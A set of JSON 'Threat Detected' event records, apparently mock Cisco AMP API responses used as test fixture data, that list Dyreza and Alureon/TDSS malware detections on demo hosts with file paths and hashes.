-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176257791640994000,"timestamp":1610705557,"timestamp_nanoseconds":898000000,"date":"2021-01-15T10:12:37+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176257791640993860","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176257740101386000,"timestamp":1610705545,"timestamp_nanoseconds":901000000,"date":"2021-01-15T10:12:25+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176257740101386307","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176257688561779000,"timestamp":1610705533,"timestamp_nanoseconds":874000000,"date":"2021-01-15T10:12:13+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176257688561778754","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176257641317138000,"timestamp":1610705522,"timestamp_nanoseconds":236000000,"date":"2021-01-15T10:12:02+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176257641317138497","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533667317698527000,"timestamp":1610705512,"timestamp_nanoseconds":641000000,"date":"2021-01-15T10:11:52+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6533667317698527247","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533667317698527000,"timestamp":1610705512,"timestamp_nanoseconds":529000000,"date":"2021-01-15T10:11:52+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533667317698527246","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533667317698527000,"timestamp":1610705512,"timestamp_nanoseconds":121000000,"date":"2021-01-15T10:11:52+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533667317698527245","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176257589777531000,"timestamp":1610705510,"timestamp_nanoseconds":224000000,"date":"2021-01-15T10:11:50+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176257589777530944","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176257564007727000,"timestamp":1610705504,"timestamp_nanoseconds":218000000,"date":"2021-01-15T10:11:44+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176257564007727167","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176257512468120000,"timestamp":1610705492,"timestamp_nanoseconds":581000000,"date":"2021-01-15T10:11:32+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176257512468119614","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176257460928512000,"timestamp":1610705480,"timestamp_nanoseconds":569000000,"date":"2021-01-15T10:11:20+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176257460928512061","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5825617812646789000,"timestamp":1610705478,"timestamp_nanoseconds":875000000,"date":"2021-01-15T10:11:18+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"Eldorado:Alureon-tpd","detection_id":"5825617812646789131","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TDSS","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"c6:4e:72:6f:69:14"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"5A.tmp","file_path":"\\\\?\\C:\\WINDOWS\\Temp\\5A.tmp","identity":{"sha256":"aaa33c484a7728c49009afeaea27f0f87d7bdf27a46b61e4d0030f9d66cb6f33","sha1":"420da91c3199993c9f245b21ea060b69d7ecfd49","md5":"bfcc0861c7fb965c1f7473d3dc42cff6"},"parent":{"process_id":1480,"disposition":"Clean","file_name":"spoolsv.exe","identity":{"sha256":"e0b07f08e60ffbad36c2e58180f4b2a16dca47716044cbe0213df7b74d742f1f","sha1":"e6e904b84332191d44de729deb7bfed9bcef2ce9","md5":"60784f891563fb1b767f70117fc2428f"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5825617812646789000,"timestamp":1610705478,"timestamp_nanoseconds":156000000,"date":"2021-01-15T10:11:18+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"Eldorado:Alureon-tpd","detection_id":"5825617812646789130","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TDSS","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"c6:4e:72:6f:69:14"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tdss.exe","file_path":"\\\\?\\C:\\Documents and Settings\\admin\\Desktop\\tdss.exe","identity":{"sha256":"b75fd580c29736abd11327eef949e449f6d466a05fb6fd343d3957684c8036e5"},"parent":{"process_id":1892,"disposition":"Clean","file_name":"explorer.exe","identity":{"sha256":"1e675cb7df214172f7eb0497f7275556038a0d09c6e5a3e6862c5e26885ef455","sha1":"9d2bf84874abc5b6e9a2744b7865c193c08d362f","md5":"12896823fb95bfb3dc9b46bcaedc9923"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5825617812646789000,"timestamp":1610705478,"timestamp_nanoseconds":93000000,"date":"2021-01-15T10:11:18+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"Eldorado:Alureon-tpd","detection_id":"5825617812646789129","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TDSS","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"c6:4e:72:6f:69:14"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"57.tmp","file_path":"\\\\?\\C:\\Documents and Settings\\admin\\Local Settings\\Temp\\57.tmp","identity":{"sha256":"aaa33c484a7728c49009afeaea27f0f87d7bdf27a46b61e4d0030f9d66cb6f33","sha1":"420da91c3199993c9f245b21ea060b69d7ecfd49","md5":"bfcc0861c7fb965c1f7473d3dc42cff6"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5825617812646789000,"timestamp":1610705478,"timestamp_nanoseconds":93000000,"date":"2021-01-15T10:11:18+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"Alureon:Olmarik-tpd","detection_id":"5825617812646789128","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TDSS","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"c6:4e:72:6f:69:14"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"58.tmp","file_path":"\\\\?\\C:\\WINDOWS\\Temp\\58.tmp","identity":{"sha256":"34e2a286618a82905957c64397999e2d38092ff6b7c0c21192760376c9036f1a","sha1":"d8e5ded034afbb77ca3759e35dd0f200255a6fd5","md5":"1ef0e0c765da7f727e1eb8ff38d02ff1"},"parent":{"process_id":1480,"disposition":"Clean","file_name":"spoolsv.exe","identity":{"sha256":"e0b07f08e60ffbad36c2e58180f4b2a16dca47716044cbe0213df7b74d742f1f","sha1":"e6e904b84332191d44de729deb7bfed9bcef2ce9","md5":"60784f891563fb1b767f70117fc2428f"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5825617812646789000,"timestamp":1610705478,"timestamp_nanoseconds":78000000,"date":"2021-01-15T10:11:18+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"Eldorado:Alureon-tpd","detection_id":"5825617812646789127","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TDSS","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"c6:4e:72:6f:69:14"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tdss.exe","file_path":"\\\\?\\C:\\Documents and Settings\\admin\\Desktop\\tdss.exe","identity":{"sha256":"b75fd580c29736abd11327eef949e449f6d466a05fb6fd343d3957684c8036e5"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5825617808351822000,"timestamp":1610705477,"timestamp_nanoseconds":812000000,"date":"2021-01-15T10:11:17+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Eldorado:Alureon-tpd","detection_id":"5825617808351821830","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TDSS","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"c6:4e:72:6f:69:14"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"59.tmp","file_path":"\\\\?\\C:\\Documents and Settings\\admin\\Local 
Settings\\Temp\\59.tmp","identity":{"sha256":"b75fd580c29736abd11327eef949e449f6d466a05fb6fd343d3957684c8036e5","sha1":"bc29f1e8460915596e1dcafd0c92d6309457d149","md5":"4a052246c5551e83d2d55f80e72f03eb"},"parent":{"process_id":3728,"disposition":"Malicious","file_name":"tdss.exe","identity":{"sha256":"b75fd580c29736abd11327eef949e449f6d466a05fb6fd343d3957684c8036e5"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5825617808351822000,"timestamp":1610705477,"timestamp_nanoseconds":812000000,"date":"2021-01-15T10:11:17+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Eldorado:Alureon-tpd","detection_id":"5825617808351821829","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TDSS","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"c6:4e:72:6f:69:14"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"56.tmp","file_path":"\\\\?\\C:\\Documents and Settings\\admin\\Local Settings\\Temp\\56.tmp","identity":{"sha256":"b75fd580c29736abd11327eef949e449f6d466a05fb6fd343d3957684c8036e5"},"parent":{"process_id":3728,"disposition":"Malicious","file_name":"tdss.exe","identity":{"sha256":"b75fd580c29736abd11327eef949e449f6d466a05fb6fd343d3957684c8036e5"}}}}} 
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5825617808351822000,"timestamp":1610705477,"timestamp_nanoseconds":796000000,"date":"2021-01-15T10:11:17+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Eldorado:Alureon-tpd","detection_id":"5825617808351821827","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TDSS","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"c6:4e:72:6f:69:14"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tdss.exe","file_path":"\\\\?\\C:\\Documents and Settings\\admin\\Desktop\\tdss.exe","identity":{"sha256":"b75fd580c29736abd11327eef949e449f6d466a05fb6fd343d3957684c8036e5"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5825617808351822000,"timestamp":1610705477,"timestamp_nanoseconds":796000000,"date":"2021-01-15T10:11:17+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"Eldorado:Alureon-tpd","detection_id":"5825617808351821828","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TDSS","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"c6:4e:72:6f:69:14"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tdss.exe","file_path":"\\\\?\\C:\\Documents and Settings\\admin\\Desktop\\tdss.exe","identity":{"sha256":"b75fd580c29736abd11327eef949e449f6d466a05fb6fd343d3957684c8036e5"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5825617808351822000,"timestamp":1610705477,"timestamp_nanoseconds":796000000,"date":"2021-01-15T10:11:17+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Eldorado:Alureon-tpd","detection_id":"5825617808351821825","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TDSS","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"c6:4e:72:6f:69:14"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tdss.exe","file_path":"\\\\?\\C:\\Documents and 
Settings\\admin\\Desktop\\tdss.exe","identity":{"sha256":"b75fd580c29736abd11327eef949e449f6d466a05fb6fd343d3957684c8036e5"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5825617808351822000,"timestamp":1610705477,"timestamp_nanoseconds":796000000,"date":"2021-01-15T10:11:17+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Eldorado:Alureon-tpd","detection_id":"5825617808351821826","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TDSS","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"c6:4e:72:6f:69:14"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tdss.exe","file_path":"\\\\?\\C:\\Documents and Settings\\admin\\Desktop\\tdss.exe","identity":{"sha256":"b75fd580c29736abd11327eef949e449f6d466a05fb6fd343d3957684c8036e5"}}}} 